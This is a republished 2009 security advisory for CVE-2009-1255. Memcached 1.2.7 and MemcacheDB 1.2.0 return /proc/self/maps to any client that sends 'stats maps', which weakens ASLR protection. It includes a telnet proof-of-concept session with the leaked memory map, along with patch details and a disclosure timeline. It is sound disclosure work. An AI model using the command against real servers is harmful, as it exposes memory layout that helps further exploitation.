|
|
|
|
| |
Credit:
The information has been provided by Joe Testa.
The original article can be found at: http://www.positronsecurity.com/advisories/2009-001.html
|
| |
Vulnerable Systems:
* memcached version 1.2.7
* MemcacheDB version 1.2.0
By simply connecting to the memcached TCP port (default: 11211) or MemcacheDB's TCP port (default: 21201) and issuing a 'stats maps' command, the software will directly pipe the output of /proc/self/maps to the client (see memcached.c:1153 and memcachedb.c:946).
jdog@thegibson:~$ telnet 192.168.x.x 11211
Trying 192.168.x.x...
Connected to localhost.
Escape character is '^]'.
stats maps
08048000-08053000 r-xp 00000000 fe:01 5934920 /home/jdog/ \
sources/memcached-1.2.7/memcached
08053000-08054000 rw-p 0000b000 fe:01 5934920 /home/jdog/ \
sources/memcached-1.2.7/memcached
08054000-080a4000 rw-p 08054000 00:00 0 [heap]
b7d0a000-b7d4d000 rw-p b7d0a000 00:00 0
b7d4d000-b7d61000 r-xp 00000000 fe:01 2555942 /lib/tls/i686/ \
cmov/libpthread-2.7.so
b7d61000-b7d63000 rw-p 00013000 fe:01 2555942 /lib/tls/i686/ \
cmov/libpthread-2.7.so
b7d63000-b7d65000 rw-p b7d63000 00:00 0
b7d65000-b7d74000 r-xp 00000000 fe:01 2555943 /lib/tls/i686/ \
cmov/libresolv-2.7.so
b7d74000-b7d76000 rw-p 0000f000 fe:01 2555943 /lib/tls/i686/ \
cmov/libresolv-2.7.so
b7d76000-b7d78000 rw-p b7d76000 00:00 0
b7d78000-b7d7f000 r-xp 00000000 fe:01 2555944 /lib/tls/i686/ \
cmov/librt-2.7.so
b7d7f000-b7d81000 rw-p 00006000 fe:01 2555944 /lib/tls/i686/ \
cmov/librt-2.7.so
b7d81000-b7d95000 r-xp 00000000 fe:01 2555934 /lib/tls/i686/ \
cmov/libnsl-2.7.so
b7d95000-b7d97000 rw-p 00013000 fe:01 2555934 /lib/tls/i686/ \
cmov/libnsl-2.7.so b7d97000-b7d9a000 rw-p
b7d97000 00:00 0 b7d9a000-b7ee3000 r-xp 00000000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee3000-b7ee4000 r--p 00149000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee4000-b7ee6000 rw-p 0014a000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee6000-b7ee9000 rw-p b7ee6000 00:00 0
b7ee9000-b7efc000 r-xp 00000000 fe:01 614755 /usr/lib/ \
libevent-1.3e.so.1.0.3
b7efc000-b7efd000 rw-p 00013000 fe:01 614755 /usr/lib/ \
libevent-1.3e.so.1.0.3
b7efd000-b7efe000 rw-p b7efd000 00:00 0
b7f0e000-b7f10000 rw-p b7f0e000 00:00 0
b7f10000-b7f11000 r-xp b7f10000 00:00 0 [vdso]
b7f11000-b7f2b000 r-xp 00000000 fe:01 2557432 /lib/ld-2.7.so
b7f2b000-b7f2d000 rw-p 00019000 fe:01 2557432 /lib/ld-2.7.so
bfce7000-bfcfc000 rw-p bffeb000 00:00 0 [stack]
END
Since neither memcached nor MemcacheDB do any authentication, a well-known requirement is that the services must never be accessible by untrusted machines. If an untrusted machine were to access the services, then any contents of the cache could be read and/or modified; arbitrary data could be inserted as well.
Even in light of this requirement, it remains reasonable for an administrator to expect that using these pieces of software would not allow a trusted machine to execute arbitrary code. By extension, it remains reasonable for an administrator to rely on ASLR protections to thwart any potential buffer overflow attacks. Because of these reasonable assumptions, and because no explicit documentation warns users of this non-obvious feature and its non-obvious impact, this issue qualifies as a security weakness.
Patch Availability:
memcached v1.2.8 was released to address this issue and can be downloaded at http://memcached.googlecode.com/files/memcached-1.2.8.tar.gz
The maintainer of MemcacheDB claimed to fix the issue in the code repository, but unfortunately, has not released a stable package containing it (see section V below for details). In the meantime, the unofficial patch found in the following advisory can be applied to the source tree of MemcacheDB v1.2.0:
http://www.positronsecurity.com/advisories/2009-001.html
CVE Information:
CVE-2009-1255
Disclosure Timeline:
March 31st, 2009: Using the contents of the packaged AUTHORS file, Brad Fitzpatrick and Anatoly Vorobey were notified via e-mail.
April 7th, 2009: After receiving no reply from the official maintainers, a request to contact any acting maintainer(s) was made to the memcached mailing list at http://groups.google.com/group/memcached/browse_thread/thread/ff92b3d1a6191e4d. Dormando identified himself as a maintainer via e-mail, and was notified of the issue.
April 10th, 2009: Dormando released v1.2.8 to resolve the issue.
April 13th, 2009: Steve Chu, the maintainer of MemcacheDB, was notified of the issue. He replied that he would fix it.
April 14th, 2009: Steve Chu sent notification that the issue was fixed in the code repository and provided the following link: http://code.google.com/p/memcachedb/source/detail?r=98.
April 15th, 2009: Steve Chu was asked when a stable release would be available.
April 17th, 2009: Steve Chu was again asked when a stable release would be available.
April 18th, 2009: Steve Chu indicated that a stable release containing the fix would be available "a couple of days later."
April 24th, 2009: An update was requested from Steve Chu regarding the release date for the fixed stable version of MemcacheDB. As of April 28th, 2009, no reply was received.
|
|
|
|
|
